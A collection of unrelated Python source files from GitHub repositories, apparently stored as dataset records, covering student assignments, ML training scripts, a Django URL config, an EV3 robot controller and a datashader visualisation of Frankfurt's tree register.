rFoxesAvg/(numD + 1)\n\t\n\tfRabbitsAvg = fRabbitsAvg/(numD + 1)\n\tfFoxesAvg = fFoxesAvg/(numD + 1)\n\t\n\tcRabbitsAvg = cRabbitsAvg/(numD + 1)\n\tcFoxesAvg = cFoxesAvg/(numD + 1)\n\t\n\tflRabbitsAvg = flRabbitsAvg/(numD + 1)\n\tflFoxesAvg = flFoxesAvg/(numD + 1)\n\t\n\t\n\t# print out the averages\n\t# Here is how to do this for the rounding version\n\t#\twill display a zero for both values until the calculations are completed\n\tprint(\"\\nRounded Population Averages:\")\n\tprint(\"{:9s}{:>10.3f}\".format(\"Rabbits:\", rRabbitsAvg))\n\tprint(\"{:9s}{:>10.3f}\".format(\"Foxes:\", rFoxesAvg))\n\tprint(\"\\nFloor Population Averages:\")\n\tprint(\"{:9s}{:>10.3f}\".format(\"Rabbits:\", fRabbitsAvg))\n\tprint(\"{:9s}{:>10.3f}\".format(\"Foxes:\", fFoxesAvg))\n\tprint(\"\\nCeiling Population Averages:\")\n\tprint(\"{:9s}{:>10.3f}\".format(\"Rabbits:\", cRabbitsAvg))\n\tprint(\"{:9s}{:>10.3f}\".format(\"Foxes:\", cFoxesAvg))\n\tprint(\"\\nRaw Population Averages:\")\n\tprint(\"{:9s}{:>10.3f}\".format(\"Rabbits:\", flRabbitsAvg))\n\tprint(\"{:9s}{:>10.3f}\".format(\"Foxes:\", flFoxesAvg))\n\t\n\t\n\t\n\t\n\t\n\t# print out Table Heading\n\t# Here is a version you can use as a guide. You don't have to keep it setup this way. \n\tprint()\n\t\n\tdisplayStr = \"{:<10s}{:^20s}{:^19s}{:^20s}{:^29s}\".format(\n\t\"\", \"Rounded Values\", \"Floor Values\", \"Ceil Values\", \"Raw Values\")\n\tprint(displayStr)\n\t\n\tdisplayStr = \"{:>10s}{:>10s}{:>10s}{:>10s}{:>10s}{:>10s}{:>10s}{:>15s}{:>15s}\".format(\n\t\t\"Day\", \"Rabbits\", \"Foxes\", \"Rabbits\", \"Foxes\", \"Rabbits\", \"Foxes\", \"Rabbits\", \"Foxes\")\n\tprint(displayStr)\n\t\n\tprint(\"-\" * 100)\n\t\t\n\t# create a for-loop to print out the values using the frequency that the user specified\n\t#\tbe sure to use string formatting to make everything line up nicely\n\tfor j in range(0, numD + 1, displayFreq):\n\t\tdisplayStr = \"{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}{:>15.3f}{:>15.3f}\".format(j, rR[j], rF[j], fR[j], fF[j], cR[j], cF[j], flR[j], flF[j])\n\t\tprint(displayStr)\n\t\n\t\n\tprint()\n\t\nmain()\n","repo_name":"Mekeda/CSCI-1300-Introduction-to-Programming","sub_path":"Assingment 4.5/Oh_Milbrandt_assignment4_5.py","file_name":"Oh_Milbrandt_assignment4_5.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30506290558","text":"import streamlit as st\nimport torch\nfrom transformers import SegformerForSemanticSegmentation, SegformerImageProcessor\nimport os\nfrom dataset_and_aug import ImageSegmentationDataset\nfrom torch import nn\nfrom model_plot import get_img_seg, prob_and_name_in_bbox\nimport numpy as np\nimport cv2\n\n\ndef build_model():\n \"\"\"\n Initialize/load model weights\n :return: pretrained model\n \"\"\"\n input_path = os.getcwd()\n best_model_name = 'continue/checkpoint-4400'\n\n # load model from checkpoint\n model = SegformerForSemanticSegmentation.from_pretrained(\n os.path.join(input_path, best_model_name))\n\n return model\n\n\ndef predict(image):\n \"\"\"\n perform initialize model -> find_relevant_region -> predict -> merge img and seg -> draw helpful info\n :param image: input image\n :return: result segmented image\n \"\"\"\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = build_model()\n model = model.to(device)\n coordinates_roi = x, y, w, h = ImageSegmentationDataset.find_relevant_region(image) # find cargo\n\n # crop image for better performance\n crop_image = image[y:y + h, x:x + w]\n\n # select feature extractor\n feature_extractor_inference = SegformerImageProcessor(do_random_crop=False, do_pad=False, do_reduce_labels=False)\n pixel_values = feature_extractor_inference(crop_image, return_tensors=\"pt\").pixel_values.to(device)\n model.eval()\n outputs = model(pixel_values=pixel_values) # logits are of shape (batch_size, num_labels, height/4, width/4)\n logits = outputs.logits.cpu()\n\n # First, rescale logits to original image size\n upsampled_logits = nn.functional.interpolate(logits,\n size=crop_image.shape[::][:-1], # (height, width)\n mode='bilinear',\n align_corners=False)\n\n # Second, apply argmax on the class dimension\n classes_in_crop_segmentation_map = upsampled_logits.argmax(dim=1)[0]\n probability_in_crop_segmentation = upsampled_logits.softmax(dim=1)[0] # probability tensor [channel, width, height]\n\n original_segmentation_size = np.zeros((image.shape[0], image.shape[1]), dtype=np.uint8)\n original_segmentation_size[y:y + h, x:x + w][:] = classes_in_crop_segmentation_map[:, :]\n\n segmentation_and_image = get_img_seg(image, original_segmentation_size) # second image+ segmentation\n\n res_img, contours, label_xy_list, conf_i_class_list = prob_and_name_in_bbox(segmentation_and_image, classes_in_crop_segmentation_map,\n probability_in_crop_segmentation, coordinates_roi)\n print(f'number are polygons = {len(contours)}')\n print(f'number points = {len(contours[0])}')\n print(contours[0][-1][0])\n return res_img\n\n\ndef convert_image(img):\n \"\"\"\n Save final segmented image for download_button\n :param img: image\n :return: bytes image\n \"\"\"\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.imencode('.jpeg', img)[1].tobytes()\n return img\n\n\ndef fix_image(image, name_image):\n \"\"\"\n Main page\n :param image: input image\n :param name_image: for download_button\n :return:\n \"\"\"\n col1.write(\"Original Image :camera:\")\n col1.image(image)\n fixed = predict(image)\n col2.write(\"Fixed Image :sparkles:\")\n col2.image(fixed)\n st.sidebar.markdown(\"\\n\")\n st.sidebar.download_button(label=\"Download fixed image\",\n data=convert_image(fixed),\n file_name=f\"{name_image}\",\n mime=\"image/jpeg\")\n\n\nif __name__ == \"__main__\":\n st.set_page_config(layout=\"wide\", page_title=\"Segformer segmentation Maksim\")\n st.write(\"# Find items from your image\")\n st.write(\n \"Test page to view result model\"\n )\n st.sidebar.write(\"## Upload and download :gear:\")\n\n col1, col2 = st.columns(2)\n my_upload = st.sidebar.file_uploader(label=\"Upload an image\",\n type=[\"png\", \"jpg\", \"jpeg\"])\n\n if my_upload is not None:\n file_bytes = np.asarray(bytearray(my_upload.read()), dtype=np.uint8)\n opencv_image = cv2.imdecode(file_bytes, 1)\n opencv_image = cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB)\n name_image = my_upload.name\n fix_image(opencv_image, name_image)\n else:\n default_img = \"/home/maksim/PycharmProjects/pythonProject/data/cargo_segform_train=0.8val=0.2/train/images\" \\\n \"/81_.jpeg\"\n name_image = '81_'\n opencv_image = cv2.imread(default_img)\n opencv_image = cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB)\n fix_image(opencv_image, name_image)\n # streamlit run segformer_model/streamlit_app.py\n","repo_name":"MaximKondakov/SegFormer","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16544784222","text":"from dao import taskdao\nimport dbconnect\ntaskid=1028\ntaskname='add'\ndescription='preksha'\nstatus='completed'\npriority=1\nnotes='notes 1'\nbookmark='bookm13'\nownerid=115\ncreatorid=213\ncreatedon='2021-02-03'\nmodifiedon='2021-02-14'\n#creating obj with para\n#tsk = taskdao.task.Task(taskid, taskname, description, status, priority, notes, bookmark, ownerid, creatorid, createdon,modifiedon)\n#taskdao.run(tsk)#passing obj as param\ndbconnect.search(1028)","repo_name":"preethi-nraju/Python-Exercise","sub_path":"pythoncasestudy/mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26069797213","text":"import matplotlib as mpl\nmpl.use('Agg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport bayesian as ba\nimport read_emcee_samples as res\nimport standard_gwtransf as gw\n\ndef calc_conf_intervals_in_1d(P, x):\n\n # find the value of P corresponding to 68% and 95% confidence heights \n P_s1 = ba.nsigma_value(P, 0.5)\n P_s2 = ba.nsigma_value(P, 0.9)\n\n # calculation of condifence edges (values of x corresponding to the height s1 on the two sides) \n x_s1_l = min(x[np.where(P >= P_s1)[0]])\n x_s1_r = max(x[np.where(P >= P_s1)[0]])\n\n # calculation of condifence edges (values of x corresponding to the height s2 on the two sides) \n x_s2_l = min(x[np.where(P >= P_s2)[0]])\n x_s2_r = max(x[np.where(P >= P_s2)[0]])\n\n return P_s1, P_s2, x_s1_l, x_s1_r, x_s2_l, x_s2_r\n\n##################################################\n# MAIN\n##################################################\n\nin_dir_root = '../runs/9_param_runs/Mc_q_deltaMc_diffM'\nburnin = 1000\n\nM_inj_list = [20,40,60,80,100,120,140,160,180,200]#40\nq_inj = 9#[1,1.5,2,3,4,5,6,7,8,9]#9\niota_inj_list = [30, 45, 60, 80, 90]\n\nout_matrix = np.zeros([len(M_inj_list), len(iota_inj_list)+1])\n\nfor (i, M_inj) in enumerate(M_inj_list):\n for (j, iota_inj) in enumerate(iota_inj_list):\n\n #if q_inj == 1.5:\n #\tpost_loc = in_dir_root + '/M_40_q_1.5_iota_%d/emcee_samples.dat'%(iota_inj)\n #else:\n post_loc = in_dir_root + '/M_%d_q_9_iota_%d/emcee_samples.dat'%(M_inj, iota_inj)\n nwalkers, num_iter, ndim = 100, 3000, 11\n n_burnin = 1000\n mc, q, mc1, q1, dL, iota, t0, phi0, ra, sin_dec, pol = res.read_emcee_samples(post_loc, nwalkers, num_iter, ndim, n_burnin)\n x, x1 = mc, mc1 \n\n eta_inj = gw.eta_from_q(q_inj)\n mc_inj = gw.mc_from_toteta(M_inj, eta_inj)\n dxbyx_1d = (x[burnin:] - x1[burnin:])/mc_inj\n\n Nbins = 101\n dxbyx_bins = np.linspace(min(dxbyx_1d), max(dxbyx_1d), Nbins)\n dxbyx = np.mean(np.diff(dxbyx_bins))\n dxbyx_intp = (dxbyx_bins[:-1] + dxbyx_bins[1:])/2.\n\n P_dxbyx_1d, dxbyx_bins = np.histogram(dxbyx_1d,bins=dxbyx_bins, normed=True)\n\n s1_1d, s2_1d, left1_1d, right1_1d, left2_1d, right2_1d = calc_conf_intervals_in_1d(P_dxbyx_1d, dxbyx_intp)\n\n out_matrix[i, 0] = M_inj\n out_matrix[i, j+1] = right2_1d-left2_1d\n\nnp.savetxt('../data/90_percent_width_9dim_DeltaMcbyMcinj_diffM_abhi.txt', out_matrix, header='M i_30 i_45 i_60 i_80 i_90')\n","repo_name":"abhirup-ghosh/gr_consistency_highermodes","sub_path":"scripts/compute_90percent_CI.py","file_name":"compute_90percent_CI.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71488419664","text":"#!/usr/bin/python3\nfrom sys import argv\nif __name__ == '__main__':\n if len(argv) == 1:\n print(\"0\")\n else:\n counter = 0\n for i in range(1, len(argv)):\n pk = int(argv[i])\n counter += pk\n print(\"{}\".format(counter))\n","repo_name":"Peterkays/alx-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39042661238","text":"\"\"\"\nYour task is to return the sum of Triangular Numbers up-to-and-including\nthe nth Triangular Number.\n\nTriangular Number: \"any of the series of numbers (1, 3, 6, 10, 15, etc.)\nobtained by continued summation of the natural numbers 1, 2, 3, 4, 5, etc.\"\n\"\"\"\n\"\"\"\ndef sum_triangular_numbers(n):\n return n*(n+1)*(n+2)/6 if n>0 else 0\n\"\"\"\n\n\ndef sum_triangular_numbers(n):\n result = []\n counter = 0\n for i in range(1, n + 1):\n result.append(0.5 * i * (i+1))\n return sum(result)\n","repo_name":"rodandr13/codewars-python","sub_path":"7kyu/Sum_of_Triangular_Numbers.py","file_name":"Sum_of_Triangular_Numbers.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"22933093061","text":"from django.urls import path\n\nfrom .views import (\n home, product_detail, CreateProduct,\n UpdateProduct, DeleteProduct, ProductList, search,\n ContactView, delete_product\n)\n\napp_name = \"product\"\nurlpatterns = [\n path('///', product_detail, name='product-detail'),\n path('update//', UpdateProduct.as_view(), name=\"update-product\"),\n # path('delete//', DeleteProduct.as_view(), name=\"delete-product\"),\n path('delete//', delete_product, name=\"delete-product\"),\n path('list/', ProductList.as_view(), name=\"product_list\"),\n path('search/', search, name=\"search\"),\n path('create/', CreateProduct.as_view(), name='create-product'),\n path('contact/', ContactView.as_view(), name='contact'),\n path('', home, name='home'),\n]\n","repo_name":"patrice012/ecommerce","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43515975213","text":"import chainer.functions as F\nimport chainer.optimizers as optimizers\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tqdm import tqdm\n\nimport networks\nfrom Model import Model\nfrom utils import get_mnist, RandomIterator\n\n\ndef train():\n\tdiscriminative_optimizer = optimizers.SGD()\n\tdiscriminative_optimizer.setup(discriminative_net)\n\n\tgenerative_optimizer = optimizers.SGD()\n\tgenerative_optimizer.setup(generative_net)\n\n\tloss_disc = []\n\tloss_gen = []\n\tfor _ in tqdm(range(n_iter)):\n\t\tloss_disc_current = 0\n\t\tloss_gen_current = 0\n\t\tfor data in train_iter:\n\t\t\n\t\t\tx_real = data\n\t\t\tt_real = discriminative_net(x_real)\n\n\t\t\tgen_input = np.float32(np.random.uniform(size=(batch_size, 1)))\n\t\t\tx_fake = generative_net(gen_input)\n\t\t\tt_fake = discriminative_net(x_fake)\n\n\t\t\t# Backprop\n\t\t\tgenerative_loss = F.softmax_cross_entropy(t_fake, np.ones(shape=(batch_size), dtype=np.int32))\n\t\t\tdiscriminative_loss = F.softmax_cross_entropy(t_fake, np.zeros(shape=(batch_size), dtype=np.int32))\n\t\t\tdiscriminative_loss += F.softmax_cross_entropy(t_real, np.ones(shape=(batch_size), dtype=np.int32))\n\t\t\tdiscriminative_loss /= 2\n\t\t\t\n\t\t\tgenerative_net.cleargrads()\n\t\t\tgenerative_loss.backward() # recompute the grads\n\t\t\tgenerative_optimizer.update()\n\n\t\t\tdiscriminative_net.cleargrads()\n\t\t\tdiscriminative_loss.backward()\n\t\t\tdiscriminative_optimizer.update()\n\n\t\t\tloss_disc_current += discriminative_loss.data\n\t\t\tloss_gen_current += generative_loss.data\n\n\t\tloss_gen.append(loss_gen_current/train_iter.idx)\n\t\tloss_disc.append(loss_disc_current/train_iter.idx)\n\n\tplt.plot(loss_disc, label=\"Discriminator Loss\")\n\tplt.plot(loss_gen, label=\"Generator Loss\")\n\tplt.legend()\n\tplt.ylabel(\"Loss\")\n\tplt.xlabel(\"Epoch\")\n\tplt.show()\n\tfor i in range(4):\n\t\tgen_input = np.float32(np.random.uniform(size=[1, 1]))\n\t\tgeneration = generative_net(gen_input) # we need to keep the variable type around, to compute stuff\n\n\t\tplt.imshow(np.reshape(generation.data, newshape=[28, 28]).transpose())\n\t\tplt.show()\n\n\nif __name__ == \"__main__\":\n\tn_iter = 500\n\tbatch_size = 50\n\ttrain_data, test_data = get_mnist(n_train=1000, n_test=100, with_label=False, classes=[0], n_dim=3)\n\ttrain_iter = RandomIterator(train_data, batch_size)\n\ttest_iter = RandomIterator(test_data, batch_size)\n\n\tdiscriminative_net = networks.DiscriminativeMLP(n_hidden=20)\n\tgenerative_net = networks.GenerativeMLP(n_hidden=200)\n\n\tdiscriminative_net = networks.DiscriminativeConvolutional().to_gpu()\n\tgenerative_net = networks.GenerativeDeconvolutional(256).to_gpu()\n\n\ttrain()\n","repo_name":"dverheijden/Computational-Cognitive-Neuroscience","sub_path":"Practical Assignment 6/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"4671560066","text":"#!/usr/bin/env python3\n\nimport json\nimport time\n\nfrom ev3dev import ev3\nfrom messages.server import Device\n\nfrom brick import Brick\nimport status\n\nHORIZONTAL_SOCKET = 0\nHORIZONTAL_SPEED = 360\nHORIZONTAL_SPEED_FOR_SCANNING = 60\n\nTOUCH_SENSOR_LEFT_ADDRESS = 'in1'\nTOUCH_SENSOR_RIGHT_ADDRESS = 'in2'\n\n# move the robot to the left end when start\n# make sure the touch sensor works or the whole thing will goes wrong\nMOVE_TO_INITIAL_POSITION = False\nSTART_FROM_LEFT = True\nROBOT_LENGTH = 170\nRAILS_LENGTH = 705\n\n\nclass Brick13(Brick):\n\n def __init__(self, brick_id):\n super().__init__(brick_id)\n\n self.horizontal_motor = self.MOTORS[HORIZONTAL_SOCKET]\n\n self.touch_sensor_left = ev3.TouchSensor(address=TOUCH_SENSOR_LEFT_ADDRESS)\n self.touch_sensor_right = ev3.TouchSensor(address=TOUCH_SENSOR_RIGHT_ADDRESS)\n\n print('TouchSensor left connected? ' + str(self.touch_sensor_left.connected))\n print('TouchSensor right connected? ' + str(self.touch_sensor_right.connected))\n print('Stop action set to: ' + self.stop_action)\n\n if MOVE_TO_INITIAL_POSITION:\n if START_FROM_LEFT:\n if str(self.touch_sensor_left.connected):\n print(\"move to very left position in 1 second\")\n time.sleep(1)\n self.move(ROBOT_LENGTH - RAILS_LENGTH, [HORIZONTAL_SOCKET])\n # make sure it will stop\n self.stop_motors([HORIZONTAL_SOCKET])\n\n else:\n print(\"Left touch sensor not ready\")\n\n else:\n if str(self.touch_sensor_right.connected):\n print(\"move to very right position in 1 second\")\n time.sleep(1)\n self.move(RAILS_LENGTH - ROBOT_LENGTH, [HORIZONTAL_SOCKET])\n print(\"get the position,set the position value to \" + str(RAILS_LENGTH - ROBOT_LENGTH))\n # make sure it will stop\n self.stop_motors([HORIZONTAL_SOCKET])\n\n elif str(self.touch_sensor_left.connected):\n print(\"Only left touch sensor is connected\")\n\n else:\n print(\"None of the touch sensors are ready\")\n\n else:\n print(\"Disabled moving to 0 position function\")\n\n def move(self, distance, socket, scanning=False):\n if not self.touch_sensor_left.connected or not self.touch_sensor_right.connected:\n print('Refusing to move: unsafe without touch sensors')\n return\n\n motor = self.horizontal_motor\n if motor.connected:\n # convert to cm and then to deg\n angle = int(self.cm_to_deg(float(distance) / 10))\n if scanning:\n motor.run_to_rel_pos(position_sp=angle, speed_sp=HORIZONTAL_SPEED_FOR_SCANNING, )\n else:\n motor.run_to_rel_pos(position_sp=angle, speed_sp=HORIZONTAL_SPEED, )\n\n else:\n print('Horizontal motor not connected. Cannot move')\n\n while not self.motor_ready(motor):\n if distance > 0 and self.touch_sensor_left.is_pressed:\n self.stop_motors([HORIZONTAL_SOCKET])\n print('Reached left edge! Stopping motors')\n self.send_message(socket, status.MESSAGE_LEFT_EDGE)\n # Similarly, we only care about the right sensor if we're moving right\n if distance < 0 and self.touch_sensor_right.is_pressed:\n self.stop_motors([HORIZONTAL_SOCKET])\n print('Reached right edge! Stopping motors')\n self.send_message(socket, status.MESSAGE_RIGHT_EDGE)\n\n if self.touch_sensor_left.is_pressed:\n print('Touch sensor Left PRESSED')\n if self.touch_sensor_right.is_pressed:\n print('Touch sensor Right PRESSED')\n\n print('The motor state is now ' + str(motor.state))\n\n time.sleep(0.1)\n\n def reset_position(self, socket):\n self.move(200000, socket)\n\n def parse_message(self, data, socket):\n print(\"Parse message: \" + data)\n\n json_command = json.loads(data)\n\n command_type = list(json_command.keys())[0]\n command_args = json_command[command_type]\n\n if (command_type == 'horizontal' and len(command_args) == 1 and\n 'amount' in command_args.keys()):\n self.move(command_args['amount'], socket)\n\n elif command_type == 'horizontal_scan' and len(command_args) == 1 and 'amount' in command_args.keys():\n self.move(command_args['amount'], socket, scanning=True)\n\n elif command_type == 'stop':\n if len(command_args) == 1 and ('stop' in command_args.keys()):\n self.stop_motors(command_args['ports'])\n elif len(command_args) == 0:\n self.stop_motors()\n else:\n raise ValueError('Invalid stop command')\n\n elif command_type == status.MESSAGE_RESET_POSITION and len(command_args) == 0:\n self.reset_position(socket)\n\n elif command_type == status.MESSAGE_TOP_EDGE:\n print(\"Hit the TOP touch sensor\")\n\n elif command_type == status.MESSAGE_BOTTOM_EDGE:\n print(\"Hit the BOTTOM touch sensor\")\n\n else:\n raise ValueError('Invalid command')\n\n\nif __name__ == '__main__':\n # Initialize brick\n brick = Brick13(Device.RPI)\n","repo_name":"Battery233/Biblio-tech","sub_path":"brick-13.py","file_name":"brick-13.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70064114382","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom model_ann import ANN\nimport time\n\n\ndef train(device, ds, model=None, nn_config=None):\n DEFAULT_NUM_EPOCHS = 300\n DEFAULT_BATCH_SIZE = 600\n DEFAULT_LEARNING_RATE = 0.001\n DEFAULT_MID_LAYERS = [30, 10]\n torch.manual_seed(0)\n TEST = False\n if nn_config is None:\n nn_config = {\"num_epochs\": DEFAULT_NUM_EPOCHS, \"batch_size\":DEFAULT_BATCH_SIZE,\n \"lr\" : DEFAULT_LEARNING_RATE, \"mid\" : DEFAULT_MID_LAYERS\n }\n num_epochs = nn_config[\"num_epochs\"] if \"num_epochs\" in nn_config else DEFAULT_NUM_EPOCHS\n batch_size = nn_config[\"batch_size\"] if \"batch_size\" in nn_config else DEFAULT_BATCH_SIZE\n lr = nn_config[\"lr\"] if \"lr\" in nn_config else DEFAULT_LEARNING_RATE\n mid = nn_config[\"mid\"] if \"mid\" in nn_config else DEFAULT_MID_LAYERS\n dataloader = DataLoader(ds, batch_size=batch_size, shuffle=True)\n x_size = ds.get_x().shape[1]\n if model is None:\n model = ANN(size = x_size, mid=mid)\n if TEST:\n print(num_epochs, batch_size, lr, mid)\n print(model)\n return model\n model.train()\n model.to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=0.001)\n criterion = torch.nn.MSELoss(reduction='sum')\n n_batches = int(len(ds)/batch_size) + 1\n batch_number = 0\n loss = None\n start = time.time()\n for epoch in range(num_epochs):\n batch_number = 0\n for (x, y) in dataloader:\n x = x.to(device)\n y = y.to(device)\n y_hat = model(x)\n y_hat = y_hat.reshape(-1)\n loss = criterion(y_hat, y)\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n batch_number += 1\n print(f'Epoch:{epoch + 1} (of {num_epochs}), Batch: {batch_number} of {n_batches}, Loss:{loss.item():.6f}')\n\n return model\n\n#\n# if __name__ == \"__main__\":\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# train(device)","repo_name":"arf-themascoteers/lucas-visible","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16739395108","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nimport pandas as pd\nimport datashader as ds\nfrom pyproj import Proj, transform\nfrom datashader.utils import lnglat_to_meters as webm\nfrom functools import partial \nfrom datashader.utils import export_image\nfrom datashader.colors import colormap_select, Greys9\nfrom IPython.core.display import HTML, display\nimport datashader.transfer_functions as tf\n\n\n# In[2]:\n\n\ndf = pd.read_csv(\"/Users/morrow/Documents/Baumkataster_Visualisierung/Baum.csv\", sep=\";\" , decimal=\".\")\n\ndf['Gattung'] = df['Gattung/Art/Deutscher Name'].str.split(',').str[0]\ndf['Deutscher Name'] = df['Gattung/Art/Deutscher Name'].str.split(',').str[1]\ndf['HOCHWERT'] = (df['HOCHWERT'].replace('\\,','.', regex=True).astype(float))\ndf['RECHTSWERT'] = (df['RECHTSWERT'].replace('\\,','.', regex=True).astype(float))\ndf['Kronendurchmesser'] = df['Kronendurchmesser'].replace('\\,','.', regex=True).astype(float)\ndf.head()\n\n\n# In[3]:\n\n\ndf.drop(columns=['Gattung/Art/Deutscher Name'])\n\n\n# In[ ]:\n\n\n\n\n\n# In[18]:\n\n\n#utm15_wgs84 = Proj(init='epsg:32632', proj='utm',zone=10,ellps='WGS84', preserve_units=False)\nutm15_wgs84 = Proj(init='epsg:5243', proj='utm', zone='32N', ellps=\"GRS80\")\ndf[['lon', 'lat']] = df.apply(lambda row:utm15_wgs84(row['RECHTSWERT'], row['HOCHWERT'], inverse=True), axis=1).apply(pd.Series)\n\n\n# In[5]:\n\n\ny_range_min = df['lat'].quantile(0.01)\ny_range_max = df['lat'].quantile(0.99)\nx_range_min = df['lon'].quantile(0.01)\nx_range_max = df['lon'].quantile(0.99)\n\n\n# In[6]:\n\n\ndf.head()\ndf.drop(columns=['Gattung/Art/Deutscher Name'])\ndf['Kronendurchmesser'].unique()\nnp.sort(df['Kronendurchmesser'])\n\n\n# In[8]:\n\n\nbins = [0,2,4,6,10,15,20,30,50]\nlabels = ['mini', 'klein', 'klein_2', 'mittel', 'mittel_2', 'mittel_3', 'groß', 'groß_2']\ndf['diskret_kronendurchmesser'] = pd.cut(df.Kronendurchmesser, bins=bins, labels=labels)\ndf.drop(columns=['Gattung/Art/Deutscher Name'])\n\n\n# In[7]:\n\n\n# Alle Bäume, die nach 2000 gepflanzt wurden\ndf['Pflanzjahr'] = (df['Pflanzjahr'].astype(int))\nnew_df = df[df['Pflanzjahr'] >= 2000].copy()\n\n\n# In[8]:\n\n\nsw = webm(x_range_min, y_range_min)\nne = webm(x_range_max, y_range_max)\nFFM = zip(sw, ne)\n\n\n# In[9]:\n\n\n# Initialize plot for datashader\n\nplot_width = int(2000)\nplot_height = int(2000)\nbackground=\"black\"\nexport = partial(export_image, background = background, export_path=\"export\")\n#cm = partial(colormap_select, reverse=(background!=\"black\"))\ncm = partial(colormap_select, reverse=(background!=\"black\"))\n\n\ndisplay(HTML(\"\"))\n\n\n# In[10]:\n\n\ncvs = ds.Canvas(plot_width, plot_height, *FFM)\nagg = cvs.points(df, 'RECHTSWERT', 'HOCHWERT')\n\n\n# In[23]:\n\n\n# Export image on different styles or conditions\nexport(tf.shade(agg, cmap = cm(Greys9,0.2), how='log'), \"Frankfurt_Baumbestand\")\n\n\n# In[22]:\n\n\nfrom colorcet import fire\nexport(tf.shade(agg, cmap = cm(fire,0.4), how='log'), \"Frankfurt_Baumbestand_Fire\")\n\n\n# In[21]:\n\n\nfrom colorcet import glasbey\nexport(tf.shade(agg, cmap = cm(glasbey,0.4), how='eq_hist'), \"Frankfurt_Baumbestand_Glasbey\")\n\n\n# In[15]:\n\n\nfrom colorcet import glasbey\ncvs = ds.Canvas(plot_width, plot_height, *FFM)\nagg = cvs.points(df, 'RECHTSWERT', 'HOCHWERT', ds.count_cat('diskret_kronendurchmesser'))\nexport(tf.shade(agg, cmap = cm(glasbey,0.4)), \"Frankfurt_Baumbestand_Category\")\n\n\n# In[16]:\n\n\nlegend_elements = list()\n\n# Create legend for tree size colors \nlabels = dict(\n zip(\n [\n 'mini', \n 'klein', \n 'klein_2', \n 'mittel', \n 'mittel_2', \n 'mittel_3', \n 'groß', \n 'groß_2'],\n np.arange(8) ) )\n\nfor category, category_code in labels.items(): \n element = Line2D(\n [0],\n [0], \n marker='o',\n color='k',\n label=category,\n markerfacecolor=glasbey[category_code],\n markersize=10)\n \n # append legend entry to list of legend entries\n legend_elements.append(element)\n\n#Create arbitrary plot\nfig, ax = plt.subplots()\nlegend = ax.legend(handles=legend_elements, loc='center')\n\n#Format the legend \nlegend.get_frame().set_linewidth(1)\nlegend.get_frame().set_facecolor('k')\nplt.setp(legend.get_texts(), color='w')\n\n# save SVG of legend to file\nplt.savefig('legend.png')\nplt.close()\n\n\n# In[ ]:\n\n\n\n\n\n# In[17]:\n\n\nfrom colorcet import fire\ny_range_min_new = new_df['lat'].quantile(0.01)\ny_range_max_new = new_df['lat'].quantile(0.99)\nx_range_min_new = new_df['lon'].quantile(0.01)\nx_range_max_new = new_df['lon'].quantile(0.99)\n\nsw_new = webm(x_range_min_new, y_range_min_new)\nne_new = webm(x_range_max_new, y_range_max_new)\nFFM_new = zip(sw_new, ne_new)\n\n\nplot_width = int(2000)\nplot_height = int(2000)\nbackground=\"black\"\nexport = partial(export_image, background = background, export_path=\"export\")\n#cm = partial(colormap_select, reverse=(background!=\"black\"))\ncm = partial(colormap_select, reverse=(background!=\"black\"))\n\n\ndisplay(HTML(\"\"))\n\ncvs = ds.Canvas(plot_width, plot_height, *FFM)\nagg = cvs.points(new_df, 'RECHTSWERT', 'HOCHWERT')\n\nexport(tf.shade(agg, cmap = cm(fire,0.4), how='log'), \"Frankfurt_Baumbestand_nach_2000\")\n\n\n# In[17]:\n\n\nfrom datashader.utils import lnglat_to_meters\ndf.loc[:, 'lon'], df.loc[:, 'lat'] = lnglat_to_meters(df.lon,df.lat)\n\n\n# In[12]:\n\n\nimport holoviews as hv\nfrom holoviews.element.tiles import EsriImagery\nfrom holoviews.operation.datashader import datashade\n#from datashader.utils import lnglat_to_meters\nhv.extension('bokeh')\nfrom colorcet import fire\n\n#df.loc[:, 'lon'], df.loc[:, 'lat'] = lnglat_to_meters(df.lon,df.lat)\nmap_tiles = EsriImagery().opts(alpha=0.5, width=900, height=600, bgcolor='black')\npoints = 